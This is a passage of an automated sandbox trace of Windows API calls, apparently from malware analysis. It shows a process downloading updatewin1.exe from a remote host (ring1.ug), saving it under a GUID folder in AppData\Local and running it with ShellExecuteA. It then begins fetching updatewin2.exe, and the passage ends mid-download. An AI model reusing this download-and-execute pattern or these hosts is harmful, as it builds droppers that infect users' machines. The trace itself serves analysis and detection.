Uuid=0x9b6d768 | out: Uuid=0x9b6d768) returned 0x0 [0040.844] UuidToStringA (in: Uuid=0x9b6d768, StringUuid=0x9b6d6c0 | out: StringUuid=0x9b6d6c0) returned 0x0 [0040.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257390 [0040.844] RpcStringFreeA (in: String=0x9b6d6c0 | out: String=0x9b6d6c0) returned 0x0 [0040.844] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc") returned 1 [0040.844] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc"), lpSecurityAttributes=0x0) returned 1 [0040.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x410) returned 0x322d838 [0040.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x410) returned 0x3267f98 [0040.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1000) returned 0x32683b0 [0040.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3267f98, cbMultiByte=-1, lpWideCharStr=0x32683b0, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc") returned 81 [0040.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1010) returned 0x32693b8 [0040.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32683b0 | out: hHeap=0x660000) returned 1 [0040.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3267f98 | out: hHeap=0x660000) returned 1 [0040.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3240b28 [0040.845] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0040.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32166c8 [0040.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3267f98 [0040.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32166c8, cbMultiByte=-1, lpWideCharStr=0x3267f98, cchWideChar=1072 | out: lpWideCharStr="http://ring1.ug/files/penelop/updatewin1.exe") returned 45 [0040.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268800 [0040.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3267f98 | out: hHeap=0x660000) returned 1 [0040.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32166c8 | out: hHeap=0x660000) returned 1 [0040.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x326a3d0 [0040.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x3267f98 [0040.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring1.ug/files/penelop/updatewin1.exe", cchWideChar=-1, lpMultiByteStr=0x3267f98, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring1.ug/files/penelop/updatewin1.exe", lpUsedDefaultChar=0x0) returned 45 [0040.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x326ac48 [0040.851] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3267f98 | out: hHeap=0x660000) returned 1 [0040.851] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a3d0 | out: hHeap=0x660000) returned 1 [0040.851] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring1.ug/files/penelop/updatewin1.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0041.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326ac48 | out: hHeap=0x660000) returned 1 [0041.613] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9b6d6d0, lpdwBufferLength=0x9b6d710, lpdwIndex=0x0 | out: lpBuffer=0x9b6d6d0*, lpdwBufferLength=0x9b6d710*=0x4, lpdwIndex=0x0) returned 1 [0041.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32167e8 [0041.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x322b110 [0041.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32167e8 | out: hHeap=0x660000) returned 1 [0041.614] lstrcpyA (in: lpString1=0x322d430, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" [0041.614] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", pMore="updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe") returned 1 [0041.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x742238 [0041.614] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5ec [0041.614] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0041.614] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.652] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.653] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.690] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.690] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.691] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.691] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.725] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.740] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.740] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.741] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.741] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.741] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.742] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.742] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.742] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.783] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.783] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.786] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.787] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.787] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.787] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.788] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.788] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.788] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.788] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.789] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.789] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.814] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.814] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.814] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.815] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.829] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.830] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.830] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.831] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.831] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.831] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0041.831] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0041.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0042.061] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0042.062] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.062] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0042.062] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.062] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0042.063] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.063] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0042.064] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.065] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0042.065] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.065] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0xa00) returned 1 [0042.066] WriteFile (in: hFile=0x5ec, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0xa00, lpOverlapped=0x0) returned 1 [0042.066] CloseHandle (hObject=0x5ec) returned 1 [0042.069] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0042.074] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0042.075] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0043.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x742238 | out: hHeap=0x660000) returned 1 [0043.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322b110 | out: hHeap=0x660000) returned 1 [0043.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268800 | out: hHeap=0x660000) returned 1 [0043.045] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0043.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216bd8 [0043.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0043.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3216bd8, cbMultiByte=-1, lpWideCharStr=0x3268798, cchWideChar=1072 | out: lpWideCharStr="http://ring1.ug/files/penelop/updatewin2.exe") returned 45 [0043.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x9c70960 [0043.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0043.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216bd8 | out: hHeap=0x660000) returned 1 [0043.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0043.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0043.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring1.ug/files/penelop/updatewin2.exe", cchWideChar=-1, lpMultiByteStr=0x9c5d1d0, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring1.ug/files/penelop/updatewin2.exe", lpUsedDefaultChar=0x0) returned 45 [0043.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0043.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0043.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0043.045] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring1.ug/files/penelop/updatewin2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0043.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0043.233] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9b6d6d0, lpdwBufferLength=0x9b6d710, lpdwIndex=0x0 | out: lpBuffer=0x9b6d6d0*, lpdwBufferLength=0x9b6d710*=0x4, lpdwIndex=0x0) returned 1 [0043.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298920 [0043.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328d168 [0043.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298920 | out: hHeap=0x660000) returned 1 [0043.233] lstrcpyA (in: lpString1=0x322d430, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" [0043.233] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", pMore="updatewin2.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe") returned 1 [0043.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b040 [0043.233] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b8 [0043.233] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0043.233] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.289] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, 